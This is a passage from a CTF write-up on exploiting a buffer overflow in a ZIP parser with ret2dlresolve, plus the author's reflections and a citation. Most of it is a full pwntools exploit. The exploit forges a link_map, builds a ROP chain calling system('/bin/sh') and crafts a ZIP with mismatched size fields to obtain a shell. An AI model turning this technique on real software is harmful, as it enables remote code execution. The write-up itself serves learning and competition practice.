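To double-check the two conflicting size fields, the headers can be parsed back with plain struct calls. The sketch below rebuilds small stand-in headers with the same field positions as the script above (compressed size at offset 18 in the local file header and at offset 20 in the central directory file header); the sample size 0x108 and the helper names are made up for the example.

```python
import struct

PH = b"A"  # placeholder byte, as in the script above


def lfh_comp_size(blob: bytes, off: int = 0) -> int:
    """Compressed size stored in a local file header at blob[off:]."""
    assert blob[off:off + 4] == b"PK\x03\x04"
    return struct.unpack_from("<I", blob, off + 18)[0]


def cdfh_comp_size(blob: bytes, off: int = 0) -> int:
    """Compressed size stored in a central directory file header at blob[off:]."""
    assert blob[off:off + 4] == b"PK\x01\x02"
    return struct.unpack_from("<I", blob, off + 20)[0]


# Stand-in headers: the local header carries the real (large) size,
# the central directory carries the small size that passes the check.
lfh = (struct.pack("<I", 0x04034B50) + PH * 14 + struct.pack("<I", 0x108)
       + PH * 4 + struct.pack("<HH", 8, 0) + PH * 8)
cdfh = (struct.pack("<I", 0x02014B50) + PH * 16 + struct.pack("<I", 0x40)
        + PH * 4 + struct.pack("<HHH", 8, 0, 0) + PH * 8
        + struct.pack("<I", 0) + PH * 8)

print(hex(lfh_comp_size(lfh)), hex(cdfh_comp_size(cdfh)))
```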
Send payloads
# Send size t
payload = str(size_t + 1).rjust(8, '0').encode()
io.send(payload)
# Send zip file with ROP
io.send(zip_file)
# Send fake link map
io.send(forge_data)
io.interactive()
At last, we just need to send the zip file with the ROP chain included, and the program should read the forge_data into forge_area. We can verify in gdb that the program returns to _dl_runtime_resolve with the correct register and stack setup:
- the pointer to the forged link_map is the first value on the stack, followed by rel_offset = 0
- we can see that the l_addr value matches
- the pointer to /bin/sh is in rdi
Therefore, we resolve to system successfully with the desired argument.
Execution
Finally, the exploit is complete and everything is ready to go.
from pwn import *
PH = b'A'
context.terminal = ['tmux', 'splitw', '-h']
elf = context.binary = ELF('./chal')
libc = ELF('libc.so.6')
local = True
if local:
    io = elf.process()
else:
    host = '34.139.216.197'
    port = 7293
    io = remote(host, port)
if args.GDB:
    gdb.attach(io, """
    b *parse_data+522
    c
    n 14
    """)
###############################################################################
# ret2dlresolve
###############################################################################
rop = ROP([elf])
# bypass push link_map by adding 0x6 offset
resolver = elf.get_section_by_name(".plt")["sh_addr"] + 0x6
forge_area = elf.get_section_by_name(".bss")["sh_addr"] + 0x100
SYMTAB = elf.dynamic_value_by_tag('DT_SYMTAB')
STRTAB = elf.dynamic_value_by_tag('DT_STRTAB')
JMPREL = elf.dynamic_value_by_tag('DT_JMPREL')
log.info('-' * 50)
log.info(f'_dl_resolve address: {hex(resolver)}')
log.info(f'.dynsym address: {hex(SYMTAB)}')
log.info(f'.dynstr address: {hex(STRTAB)}')
log.info(f'.rel.plt address: {hex(JMPREL)}')
log.info(f'writable buffer address: {hex(forge_area)}')
###############################################################################
# Forge link_map and other tables
###############################################################################
BITMAP_64 = (1 << 64) - 1
# offset between system and target_func
target_func = 'atoi'
l_addr = libc.sym['system'] - libc.sym[target_func]
log.info('-' * 50)
log.info('Making fake link_map')
log.info(f'system@libc - {target_func}@libc: {hex(l_addr)}')
forge_data = flat({
# link_map
0x0: l_addr & BITMAP_64, # l_addr
0x68: forge_area, # l_info[5], ptr to DT_STRTAB in _DYNAMIC
# we won't use it so any writable area
0x70: forge_area + 0x38, # l_info[6], ptr to DT_SYMTAB in _DYNAMIC
0xf8: forge_area + 0x8, # l_info[23], ptr to DT_JMPREL in _DYNAMIC
# _DYNAMIC
# for DT_JMPREL
0x8: flat([
0, # d_tag
forge_area + 0x18 # d_val, ptr to DT_JMPREL
]),
# for DT_SYMTAB
0x38: flat([
0, # d_tag
elf.got[target_func] - 0x8 # d_val, ptr to DT_SYMTAB
# s.t. st_value pts to the target function in GOT
]),
# DT_JMPREL
0x18: flat([
# normally this points to the real GOT, now we need an area to read/write.
forge_area - l_addr, # rela->r_offset
7, # rela->r_info, 7>>32=0, points to index 0 of .symtab
0 # # rela->r_addend
]),
# DT_STRTAB
0x48: b'/bin/sh\00',
})
log.info(f'Finish make the link_map, etc, size: {hex(len(forge_data))}')
rop.read(0, forge_area, len(forge_data)) # read the link_map
rop.raw(rop.ret) # align stack to 0x10 to call system successfully
rop.call(resolver, [forge_area + 0x48]) # call system("/bin/sh")
rop.raw(forge_area) # link_map
rop.raw(0) # rel_offset
###############################################################################
# Make zip file
###############################################################################
# Make compressed data
comp_data = PH * 0xa8
comp_data += rop.chain()
# 1. Make local file header
comp_size = len(comp_data)
len_file_name = 8 # for easier alignment
len_extra_field = 0
len_comment = 0
LFH = p32(0x04034b50)
LFH += PH * 14
LFH += p32(comp_size) # Compressed size
LFH += PH * 4
LFH += p16(len_file_name) # length file name
LFH += p16(len_extra_field) # length of extra field
LFH += PH * len_file_name # file name
LFH += PH * len_extra_field # extra field
# 2. Make Central directory file header
CDFH = p32(0x02014b50)
CDFH += PH * 16
CDFH += p32(0x40) # Compressed size, HACKED
CDFH += PH * 4
CDFH += p16(len_file_name) # File name length
CDFH += p16(len_extra_field) # Extra field length
CDFH += p16(len_comment) # File comment length
CDFH += PH * 8
CDFH += p32(0) # Relative offset of local file header.
CDFH += PH * len_file_name # file name
CDFH += PH * len_extra_field # extra field
CDFH += PH * len_comment # comment
# 3. Make End of central directory record (EOCD)
cd_size = len(CDFH)
# Offset of start of central directory, relative to start of archive
cd_offset = len(LFH) + len(comp_data)
EOCD = p32(0x06054b50) # End of central directory record
EOCD += PH * 6
# Total number of central directory records
EOCD += p16(1)
# Size of central directory (bytes)
EOCD += p32(cd_size)
# Offset of start of central directory, relative to start of archive
EOCD += p32(cd_offset)
EOCD += PH * 2
zip_file = LFH + comp_data + CDFH + EOCD
size_t = len(zip_file)
log.info(f'Finished making zip file, size: {size_t} bytes')
###############################################################################
# Execution
###############################################################################
log.info('-' * 50)
# Send size t
payload = str(size_t + 1).rjust(8, '0').encode()
io.send(payload)
# Send zip file with ROP
io.send(zip_file)
# Send fake link map
io.send(forge_data)
io.interactive()
Thoughts
It literally took me a whole day to research ret2dlresolve and exploit the binary during the 48-hour competition. I didn’t completely understand what was going on even after I captured the flag. It then took me another entire day to dive further into the topic and write this writeup.
I was surprised by seal9055’s solution, which does the ret2dlresolve exploitation with only 2 pwntools functions. So I decided to dig in to see whether my time was well spent. It turns out that I was working on an approach that is quite different from what pwntools does and that handles tougher cases.
3 groups solved this challenge during the competition. One group successfully performed a partial GOT overwrite and called system@libc without ret2dlresolve.
I read through most of the 64-bit ret2dlresolve writeups I could find on Google and didn’t see another one using a similar strategy, one that requires looking into the source code of _dl_fixup(). So I decided to write this one in more detail.
Limitation
- We have to know the libc version to calculate l_addr. The partial GOT overwrite approach has the same limitation. In theory, pwntools ret2dlresolve doesn’t need to know the libc version because it looks the function up by name.
- This is not an idea derived from theory. It depends on the implementation of ld.so, so it probably won’t work with a different implementation of ld.so.
- To deal with the 2nd limitation, we could probably do something with the DT_VERSYM entry in link_map, but then we would need to worry about more parts in multiple sections, and I believe it wouldn’t be easier than my approach. It would also require manually forging link_map anyway.
Reference
If you found this useful, please cite this as:
Wei, Guanghao (Apr 2022). Advanced CTF Writeup: Exploiting Buffer Overflow in ZIP Parser with ret2dlresolve. Gary Wei Machine Learning. https://acad.garywei.dev.
or as a BibTeX entry:
@article{wei2022advanced-ctf-writeup-exploiting-buffer-overflow-in-zip-parser-with-ret2dlresolve,
title = {Advanced CTF Writeup: Exploiting Buffer Overflow in ZIP Parser with ret2dlresolve},
author = {Wei, Guanghao},
journal = {Gary Wei | Machine Learning},
year = {2022},
month = {Apr},
url = {https://acad.garywei.dev/blog/2022/ctf-zip-parser/}
}